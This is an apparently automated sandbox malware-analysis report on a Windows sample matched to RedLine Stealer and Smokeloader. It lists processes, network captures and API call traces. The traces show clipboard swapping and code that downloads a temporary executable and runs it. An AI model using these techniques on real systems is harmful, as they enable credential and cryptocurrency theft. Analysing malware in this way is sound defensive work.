                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
Timestamp: 2025-01-12 16:52:06 UTC, Bytes transferred: 14479, Direction: IN
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
Timestamp: 2025-01-12 16:52:07 UTC, Bytes transferred: 11186, Direction: IN
Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>



Target ID: 0
Start time: 11:51:57
Start date: 12/01/2025
Path: C:\Users\user\Desktop\L7GNkeVm5e.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\L7GNkeVm5e.exe"
Imagebase: 0x400000
File size: 467'968 bytes
MD5 hash: F7DB525DD98EE5FBDC9C11D59B93985B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 2
Start time: 11:52:02
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe"
Imagebase: 0x400000
File size: 403'968 bytes
MD5 hash: 08494E6A1E788EA3259955A4524FDFEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 50%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 5
Start time: 11:52:06
Start date: 12/01/2025
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884
Imagebase: 0xd90000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 3.7%
Signature Coverage: 5.7%
Total number of Nodes: 761
Total number of Limit Nodes: 21
65319->65256 65321 403c22 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65320->65321 65322 40c60e 167 API calls 65321->65322 65323 403c45 65322->65323 65324 4042a5 167 API calls 65323->65324 65325 403c4f 65324->65325 65327 403c92 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65325->65327 65329 4034f1 167 API calls 65325->65329 65326 403c70 65326->65327 65328 4046c0 167 API calls 65326->65328 65327->65258 65328->65327 65329->65326 65331 403cc4 __EH_prolog3_catch 65330->65331 65332 4042a5 167 API calls 65331->65332 65334 403cdd 65332->65334 65333 4046c0 167 API calls 65336 403d66 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65333->65336 65335 403d0d 65334->65335 65337 403695 40 API calls 65334->65337 65335->65333 65336->65261 65337->65335 65338->65260 65339->65260 65340->65268 65341->65204 65343 40cc22 _strlen 65342->65343 65349 40cbbd 65343->65349 65345 401704 65345->65207 65346->65215 65347->65222 65348->65215 65350 40cbf0 65349->65350 65351 40cbcc BuildCatchObjectHelperInternal 65349->65351 65350->65351 65353 40cb52 28 API calls 4 library calls 65350->65353 65351->65345 65353->65351 65362 40f220 EnterCriticalSection 65354->65362 65356 40deea 65357 40ce8f GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65356->65357 65358 40cec8 65357->65358 65359 40cebd CloseHandle 65357->65359 65360 40cecc GetCurrentThreadId 65358->65360 65359->65360 65360->65229 65361->65228 65362->65356 65372 431f4e GetLastError 65363->65372 65366 42e073 ExitThread 65367 42e091 65369 42e0a4 65367->65369 65370 42e09d CloseHandle 65367->65370 65369->65366 65371 42e0b0 FreeLibraryAndExitThread 65369->65371 65370->65369 65373 431f6d 65372->65373 65374 431f67 65372->65374 65376 434d1a _Atexit 17 API calls 65373->65376 65378 431fc4 SetLastError 65373->65378 65392 435101 11 API calls 2 library calls 65374->65392 65377 431f7f 65376->65377 65385 431f87 65377->65385 65393 435157 11 API calls 2 library calls 65377->65393 65380 42e06f 
65378->65380 65380->65366 65380->65367 65391 4354e6 10 API calls 2 library calls 65380->65391 65381 43345a _free 17 API calls 65383 431f8d 65381->65383 65382 431f9c 65384 431fa3 65382->65384 65382->65385 65386 431fbb SetLastError 65383->65386 65394 431d3c 20 API calls _Atexit 65384->65394 65385->65381 65386->65380 65388 431fae 65389 43345a _free 17 API calls 65388->65389 65390 431fb4 65389->65390 65390->65378 65390->65386 65391->65367 65392->65373 65393->65382 65394->65388 65395->65029 65396 402394 65397 402557 PostQuitMessage 65396->65397 65398 4023a8 65396->65398 65402 402555 65397->65402 65399 4023c6 65398->65399 65400 4023af DefWindowProcW 65398->65400 65401 4029ea 167 API calls 65399->65401 65399->65402 65400->65402 65401->65402 65403 432775 65408 432543 65403->65408 65406 43279d 65409 43256e 65408->65409 65416 4326b7 65409->65416 65423 43c8be 170 API calls 2 library calls 65409->65423 65411 432761 65427 42a58d 26 API calls _Deallocate 65411->65427 65413 4326c0 65413->65406 65420 43d00c 65413->65420 65415 432701 65415->65416 65424 43c8be 170 API calls 2 library calls 65415->65424 65416->65413 65426 42eab9 20 API calls _Atexit 65416->65426 65418 432720 65418->65416 65425 43c8be 170 API calls 2 library calls 65418->65425 65428 43c9e1 65420->65428 65422 43d027 65422->65406 65423->65415 65424->65418 65425->65416 65426->65411 65427->65413 65429 43c9ed CallCatchBlock 65428->65429 65430 43c9fb 65429->65430 65433 43ca34 65429->65433 65446 42eab9 20 API calls _Atexit 65430->65446 65432 43ca00 65447 42a58d 26 API calls _Deallocate 65432->65447 65439 43cfbb 65433->65439 65438 43ca0a std::_Locinfo::_Locinfo_ctor 65438->65422 65449 43f931 65439->65449 65442 43ca58 65448 43ca81 LeaveCriticalSection __wsopen_s 65442->65448 65445 43345a _free 20 API calls 65445->65442 65446->65432 65447->65438 65448->65438 65450 43f954 65449->65450 65451 43f93d 65449->65451 65452 43f973 65450->65452 65453 43f95c 65450->65453 65520 42eab9 20 API calls _Atexit 65451->65520 65524 434f9a 10 API 
calls 2 library calls 65452->65524 65522 42eab9 20 API calls _Atexit 65453->65522 65457 43f942 65521 42a58d 26 API calls _Deallocate 65457->65521 65458 43f961 65523 42a58d 26 API calls _Deallocate 65458->65523 65459 43f97a MultiByteToWideChar 65463 43f9a9 65459->65463 65464 43f999 GetLastError 65459->65464 65461 43cfd1 65461->65442 65473 43d02c 65461->65473 65526 433697 21 API calls 3 library calls 65463->65526 65525 42ea83 20 API calls 2 library calls 65464->65525 65467 43f9b1 65468 43f9d9 65467->65468 65469 43f9b8 MultiByteToWideChar 65467->65469 65471 43345a _free 20 API calls 65468->65471 65469->65468 65470 43f9cd GetLastError 65469->65470 65527 42ea83 20 API calls 2 library calls 65470->65527 65471->65461 65528 43cd8f 65473->65528 65476 43d077 65546 43976e 65476->65546 65477 43d05e 65560 42eaa6 20 API calls _Atexit 65477->65560 65480 43d07c 65482 43d085 65480->65482 65483 43d09c 65480->65483 65481 43d063 65561 42eab9 20 API calls _Atexit 65481->65561 65562 42eaa6 20 API calls _Atexit 65482->65562 65559 43ccfa CreateFileW 65483->65559 65487 43d08a 65563 42eab9 20 API calls _Atexit 65487->65563 65489 43d152 GetFileType 65490 43d1a4 65489->65490 65491 43d15d GetLastError 65489->65491 65568 4396b7 21 API calls 3 library calls 65490->65568 65566 42ea83 20 API calls 2 library calls 65491->65566 65492 43d127 GetLastError 65565 42ea83 20 API calls 2 library calls 65492->65565 65495 43d0d5 65495->65489 65495->65492 65564 43ccfa CreateFileW 65495->65564 65496 43d16b CloseHandle 65496->65481 65498 43d194 65496->65498 65567 42eab9 20 API calls _Atexit 65498->65567 65500 43d11a 65500->65489 65500->65492 65501 43d1c5 65503 43d211 65501->65503 65569 43cf0b 169 API calls 4 library calls 65501->65569 65509 43d23e 65503->65509 65570 43caad 167 API calls 4 library calls 65503->65570 65504 43d199 65504->65481 65507 43d237 65508 43d24f 65507->65508 65507->65509 65511 43cff9 65508->65511 65512 43d2cd CloseHandle 65508->65512 65571 4335bd 29 API calls 2 library calls 65509->65571 
65511->65445 65572 43ccfa CreateFileW 65512->65572 65514 43d2f8 65515 43d302 GetLastError 65514->65515 65516 43d247 65514->65516 65573 42ea83 20 API calls 2 library calls 65515->65573 65516->65511 65518 43d30e 65574 439880 21 API calls 3 library calls 65518->65574 65520->65457 65521->65461 65522->65458 65523->65461 65524->65459 65525->65461 65526->65467 65527->65468 65529 43cdb0 65528->65529 65530 43cdca 65528->65530 65529->65530 65582 42eab9 20 API calls _Atexit 65529->65582 65575 43cd1f 65530->65575 65533 43ce02 65536 43ce31 65533->65536 65584 42eab9 20 API calls _Atexit 65533->65584 65534 43cdbf 65583 42a58d 26 API calls _Deallocate 65534->65583 65543 43ce84 65536->65543 65586 42ffcf 26 API calls 2 library calls 65536->65586 65539 43ce7f 65541 43cefe 65539->65541 65539->65543 65540 43ce26 65585 42a58d 26 API calls _Deallocate 65540->65585 65587 42a5ba 11 API calls _Atexit 65541->65587 65543->65476 65543->65477 65545 43cf0a 65547 43977a CallCatchBlock 65546->65547 65590 42e3dd EnterCriticalSection 65547->65590 65549 4397c8 65591 439877 65549->65591 65551 4397a6 65594 43954d 21 API calls 3 library calls 65551->65594 65552 439781 65552->65549 65552->65551 65556 439814 EnterCriticalSection 65552->65556 65553 4397f1 std::_Locinfo::_Locinfo_ctor 65553->65480 65555 4397ab 65555->65549 65595 439694 EnterCriticalSection 65555->65595 65556->65549 65557 439821 LeaveCriticalSection 65556->65557 65557->65552 65559->65495 65560->65481 65561->65511 65562->65487 65563->65481 65564->65500 65565->65481 65566->65496 65567->65504 65568->65501 65569->65503 65570->65507 65571->65516 65572->65514 65573->65518 65574->65516 65577 43cd37 65575->65577 65576 43cd52 65576->65533 65577->65576 65588 42eab9 20 API calls _Atexit 65577->65588 65579 43cd76 65589 42a58d 26 API calls _Deallocate 65579->65589 65581 43cd81 65581->65533 65582->65534 65583->65530 65584->65540 65585->65536 65586->65539 65587->65545 65588->65579 65589->65581 65590->65552 65596 42e425 LeaveCriticalSection 65591->65596 
65593 43987e 65593->65553 65594->65555 65595->65549 65596->65593 65597 629005 65598 629079 65597->65598 65601 629816 65598->65601 65602 629825 65601->65602 65605 629fb6 65602->65605 65611 629fd1 65605->65611 65606 629fda CreateToolhelp32Snapshot 65607 629ff6 Module32First 65606->65607 65606->65611 65608 62a005 65607->65608 65610 629815 65607->65610 65612 629c75 65608->65612 65611->65606 65611->65607 65613 629ca0 65612->65613 65614 629cb1 VirtualAlloc 65613->65614 65615 629ce9 65613->65615 65614->65615 65615->65615 65616 4340fa 65617 434106 CallCatchBlock 65616->65617 65618 434112 65617->65618 65619 434129 65617->65619 65650 42eab9 20 API calls _Atexit 65618->65650 65629 42caef EnterCriticalSection 65619->65629 65622 434117 65651 42a58d 26 API calls _Deallocate 65622->65651 65623 434139 65630 434176 65623->65630 65626 434145 65652 43416c LeaveCriticalSection __fread_nolock 65626->65652 65628 434122 std::_Locinfo::_Locinfo_ctor 65629->65623 65631 434184 65630->65631 65632 43419e 65630->65632 65663 42eab9 20 API calls _Atexit 65631->65663 65653 4328f8 65632->65653 65635 434189 65664 42a58d 26 API calls _Deallocate 65635->65664 65636 4341a7 65660 4347c3 65636->65660 65640 4342ab 65642 4342b8 65640->65642 65649 43425e 65640->65649 65641 43422f 65644 43424c 65641->65644 65641->65649 65666 42eab9 20 API calls _Atexit 65642->65666 65665 43448f 31 API calls 4 library calls 65644->65665 65646 434256 65647 434194 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65646->65647 65647->65626 65649->65647 65667 43430b 30 API calls 2 library calls 65649->65667 65650->65622 65651->65628 65652->65628 65654 432904 65653->65654 65655 432919 65653->65655 65668 42eab9 20 API calls _Atexit 65654->65668 65655->65636 65657 432909 65669 42a58d 26 API calls _Deallocate 65657->65669 65659 432914 65659->65636 65670 434640 65660->65670 65662 4341c3 65662->65640 65662->65641 65662->65647 65663->65635 65664->65647 65665->65646 65666->65647 65667->65647 65668->65657 65669->65659 65671 43464c 
CallCatchBlock 65670->65671 65672 434654 65671->65672 65676 43466c 65671->65676 65705 42eaa6 20 API calls _Atexit 65672->65705 65673 434720 65710 42eaa6 20 API calls _Atexit 65673->65710 65676->65673 65679 4346a4 65676->65679 65677 434659 65706 42eab9 20 API calls _Atexit 65677->65706 65678 434725 65711 42eab9 20 API calls _Atexit 65678->65711 65695 439694 EnterCriticalSection 65679->65695 65683 43472d 65712 42a58d 26 API calls _Deallocate 65683->65712 65684 4346aa 65686 4346e3 65684->65686 65687 4346ce 65684->65687 65696 434745 65686->65696 65707 42eab9 20 API calls _Atexit 65687->65707 65689 434661 std::_Locinfo::_Locinfo_ctor 65689->65662 65691 4346d3 65708 42eaa6 20 API calls _Atexit 65691->65708 65692 4346de 65709 434718 LeaveCriticalSection __wsopen_s 65692->65709 65695->65684 65713 439911 65696->65713 65698 434757 65699 434770 SetFilePointerEx 65698->65699 65700 43475f 65698->65700 65701 434764 65699->65701 65702 434788 GetLastError 65699->65702 65726 42eab9 20 API calls _Atexit 65700->65726 65701->65692 65727 42ea83 20 API calls 2 library calls 65702->65727 65705->65677 65706->65689 65707->65691 65708->65692 65709->65689 65710->65678 65711->65683 65712->65689 65714 43991e 65713->65714 65717 439933 65713->65717 65728 42eaa6 20 API calls _Atexit 65714->65728 65716 439923 65729 42eab9 20 API calls _Atexit 65716->65729 65720 439958 65717->65720 65730 42eaa6 20 API calls _Atexit 65717->65730 65720->65698 65721 439963 65731 42eab9 20 API calls _Atexit 65721->65731 65722 43992b 65722->65698 65724 43996b 65732 42a58d 26 API calls _Deallocate 65724->65732 65726->65701 65727->65701 65728->65716 65729->65722 65730->65721 65731->65724 65732->65722 65733 402bfa InternetOpenW 65734 402e4b 65733->65734 65737 402c2d Concurrency::details::GlobalNode::Initialize 65733->65737 65735 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65734->65735 65736 402e5a 65735->65736 65745 42deed 65737->65745 65740 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 
65741 402e0d 65740->65741 65742 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 65741->65742 65743 402e1f InternetOpenUrlW 65742->65743 65743->65734 65744 402e3a InternetCloseHandle InternetCloseHandle 65743->65744 65744->65734 65746 42df0a 65745->65746 65748 42defc 65745->65748 65754 42eab9 20 API calls _Atexit 65746->65754 65748->65746 65751 42df3a 65748->65751 65750 402dff 65750->65740 65751->65750 65756 42eab9 20 API calls _Atexit 65751->65756 65753 42df14 65755 42a58d 26 API calls _Deallocate 65753->65755 65754->65753 65755->65750 65756->65753 65757 210003c 65758 2100049 65757->65758 65772 2100e0f SetErrorMode SetErrorMode 65758->65772 65763 2100265 65764 21002ce VirtualProtect 65763->65764 65766 210030b 65764->65766 65765 2100439 VirtualFree 65770 21004be 65765->65770 65771 21005f4 LoadLibraryA 65765->65771 65766->65765 65767 21004e3 LoadLibraryA 65767->65770 65769 21008c7 65770->65767 65770->65771 65771->65769 65773 2100223 65772->65773 65774 2100d90 65773->65774 65775 2100dad 65774->65775 65776 2100dbb GetPEB 65775->65776 65777 2100238 VirtualAlloc 65775->65777 65776->65777 65777->65763 65778 40fbfc 65779 40fc08 CallCatchBlock 65778->65779 65807 40ffe9 65779->65807 65781 40fc0f 65782 40fd62 65781->65782 65785 40fc39 65781->65785 65828 4104c3 4 API calls 2 library calls 65782->65828 65784 40fd69 65829 42ffb9 28 API calls _Atexit 65784->65829 65796 40fc78 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65785->65796 65822 42fcde 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65785->65822 65787 40fd6f 65830 42ff6b 28 API calls _Atexit 65787->65830 65790 40fd77 65791 40fc58 65792 40fc52 65792->65791 65823 42fc82 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65792->65823 65794 40fcd9 65818 4105dd 65794->65818 65796->65794 65824 42a356 167 API calls 4 library calls 65796->65824 65798 40fcdf 65799 40fcf4 65798->65799 65825 410613 GetModuleHandleW 65799->65825 65801 40fcfb 65801->65784 65802 40fcff 
65801->65802 65803 40fd08 65802->65803 65826 42ff5c 28 API calls _Atexit 65802->65826 65827 410178 13 API calls 2 library calls 65803->65827 65806 40fd10 65806->65791 65808 40fff2 65807->65808 65831 41076b IsProcessorFeaturePresent 65808->65831 65810 40fffe 65832 428817 10 API calls 3 library calls 65810->65832 65812 410003 65813 410007 65812->65813 65833 431791 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65812->65833 65813->65781 65815 410010 65816 41001e 65815->65816 65834 428840 8 API calls 3 library calls 65815->65834 65816->65781 65835 426820 65818->65835 65821 410603 65821->65798 65822->65792 65823->65796 65824->65794 65825->65801 65826->65803 65827->65806 65828->65784 65829->65787 65830->65790 65831->65810 65832->65812 65833->65815 65834->65813 65836 4105f0 GetStartupInfoW 65835->65836 65836->65821 65837 4332ce 65838 4332db 65837->65838 65841 4332f3 65837->65841 65887 42eab9 20 API calls _Atexit 65838->65887 65840 4332e0 65888 42a58d 26 API calls _Deallocate 65840->65888 65843 43334e 65841->65843 65851 4332eb 65841->65851 65889 434cbd 21 API calls 2 library calls 65841->65889 65844 4328f8 __fread_nolock 26 API calls 65843->65844 65846 433366 65844->65846 65857 432e06 65846->65857 65848 43336d 65849 4328f8 __fread_nolock 26 API calls 65848->65849 65848->65851 65850 433399 65849->65850 65850->65851 65852 4328f8 __fread_nolock 26 API calls 65850->65852 65853 4333a7 65852->65853 65853->65851 65854 4328f8 __fread_nolock 26 API calls 65853->65854 65855 4333b7 65854->65855 65856 4328f8 __fread_nolock 26 API calls 65855->65856 65856->65851 65858 432e12 CallCatchBlock 65857->65858 65859 432e32 65858->65859 65860 432e1a 65858->65860 65861 432ef8 65859->65861 65865 432e6b 65859->65865 65956 42eaa6 20 API calls _Atexit 65860->65956 65963 42eaa6 20 API calls _Atexit 65861->65963 65864 432e1f 65957 42eab9 20 API calls _Atexit 65864->65957 65868 432e7a 65865->65868 65869 432e8f 65865->65869 65866 432efd 
65964 42eab9 20 API calls _Atexit 65866->65964 65958 42eaa6 20 API calls _Atexit 65868->65958 65890 439694 EnterCriticalSection 65869->65890 65871 432e27 std::_Locinfo::_Locinfo_ctor 65871->65848 65874 432e87 65965 42a58d 26 API calls _Deallocate 65874->65965 65875 432e7f 65959 42eab9 20 API calls _Atexit 65875->65959 65876 432e95 65878 432eb1 65876->65878 65879 432ec6 65876->65879 65960 42eab9 20 API calls _Atexit 65878->65960 65891 432f19 65879->65891 65883 432eb6 65961 42eaa6 20 API calls _Atexit 65883->65961 65886 432ec1 65962 432ef0 LeaveCriticalSection __wsopen_s 65886->65962 65887->65840 65888->65851 65889->65843 65890->65876 65892 432f43 65891->65892 65893 432f2b 65891->65893 65895 4332ad 65892->65895 65900 432f88 65892->65900 65975 42eaa6 20 API calls _Atexit 65893->65975 65993 42eaa6 20 API calls _Atexit 65895->65993 65896 432f30 65976 42eab9 20 API calls _Atexit 65896->65976 65899 4332b2 65994 42eab9 20 API calls _Atexit 65899->65994 65902 432f93 65900->65902 65903 432f38 65900->65903 65907 432fc3 65900->65907 65977 42eaa6 20 API calls _Atexit 65902->65977 65903->65886 65904 432fa0 65995 42a58d 26 API calls _Deallocate 65904->65995 65906 432f98 65978 42eab9 20 API calls _Atexit 65906->65978 65910 432fdc 65907->65910 65911 433002 65907->65911 65912 43301e 65907->65912 65910->65911 65916 432fe9 65910->65916 65979 42eaa6 20 API calls _Atexit 65911->65979 65982 433697 21 API calls 3 library calls 65912->65982 65915 433007 65980 42eab9 20 API calls _Atexit 65915->65980 65966 43d355 65916->65966 65917 433035 65920 43345a _free 20 API calls 65917->65920 65923 43303e 65920->65923 65921 433187 65924 4331fd 65921->65924 65928 4331a0 GetConsoleMode 65921->65928 65922 43300e 65981 42a58d 26 API calls _Deallocate 65922->65981 65926 43345a _free 20 API calls 65923->65926 65927 433201 ReadFile 65924->65927 65929 433045 65926->65929 65930 433275 GetLastError 65927->65930 65931 43321b 65927->65931 65928->65924 65932 4331b1 65928->65932 65934 43306a 65929->65934 65935 
43304f 65929->65935 65936 433282 65930->65936 65937 4331d9 65930->65937 65931->65930 65947 4331f2 65931->65947 65932->65927 65933 4331b7 ReadConsoleW 65932->65933 65938 4331d3 GetLastError 65933->65938 65933->65947 65985 4347de 65934->65985 65983 42eab9 20 API calls _Atexit 65935->65983 65991 42eab9 20 API calls _Atexit 65936->65991 65939 433019 __fread_nolock 65937->65939 65988 42ea83 20 API calls 2 library calls 65937->65988 65938->65937 65940 43345a _free 20 API calls 65939->65940 65940->65903 65945 433054 65984 42eaa6 20 API calls _Atexit 65945->65984 65946 433287 65992 42eaa6 20 API calls _Atexit 65946->65992 65947->65939 65948 433240 65947->65948 65949 433257 65947->65949 65989 432c35 31 API calls 3 library calls 65948->65989 65949->65939 65953 43326e 65949->65953 65990 432a75 29 API calls __fread_nolock 65953->65990 65955 433273 65955->65939 65956->65864 65957->65871 65958->65875 65959->65874 65960->65883 65961->65886 65962->65871 65963->65866 65964->65874 65965->65871 65967 43d362 65966->65967 65968 43d36f 65966->65968 65996 42eab9 20 API calls _Atexit 65967->65996 65970 43d37b 65968->65970 65997 42eab9 20 API calls _Atexit 65968->65997 65970->65921 65972 43d367 65972->65921 65973 43d39c 65998 42a58d 26 API calls _Deallocate 65973->65998 65975->65896 65976->65903 65977->65906 65978->65904 65979->65915 65980->65922 65981->65939 65982->65917 65983->65945 65984->65939 65986 434745 __fread_nolock 28 API calls 65985->65986 65987 4347f4 65986->65987 65987->65916 65988->65939 65989->65939 65990->65955 65991->65946 65992->65939 65993->65899 65994->65904 65995->65903 65996->65972 65997->65973 65998->65972

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                                    • Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D
                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: i
• API String ID: 1583243082-3865851505
• Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
• Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
• Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
• Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
• InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
• GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
• CloseHandle.KERNEL32(00000000), ref: 00402AFD
• ShellExecuteExW.SHELL32(?), ref: 00402B5E
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
• CloseHandle.KERNEL32(?), ref: 00402B7F
• InternetCloseHandle.WININET(00000000), ref: 00402B88
• InternetCloseHandle.WININET(00000000), ref: 00402B8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: .exe$<$ShareScreen
• API String ID: 3323492106-493228180
• Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
• Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
• Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
• Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00629FDE
• Module32First.KERNEL32(00000000,00000224), ref: 00629FFE
Memory Dump Source
• Source File: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Offset: 00629000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_629000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 9ae3151deac0473f9cc799d0675f7d68fc17cc55c9a7e300d99728a0de296382
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: D9F06232200B256BD7603AF5A98DAAB76E9AF89725F100528E647D15C0DA70EC458A71

Control-flow Graph

APIs
  • Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
• GetLastError.KERNEL32 ref: 0043D140
• __dosmaperr.LIBCMT ref: 0043D147
• GetFileType.KERNEL32(00000000), ref: 0043D153
• GetLastError.KERNEL32 ref: 0043D15D
• __dosmaperr.LIBCMT ref: 0043D166
• CloseHandle.KERNEL32(00000000), ref: 0043D186
• CloseHandle.KERNEL32(?), ref: 0043D2D0
• GetLastError.KERNEL32 ref: 0043D302
• __dosmaperr.LIBCMT ref: 0043D309
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
• Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

Control-flow Graph

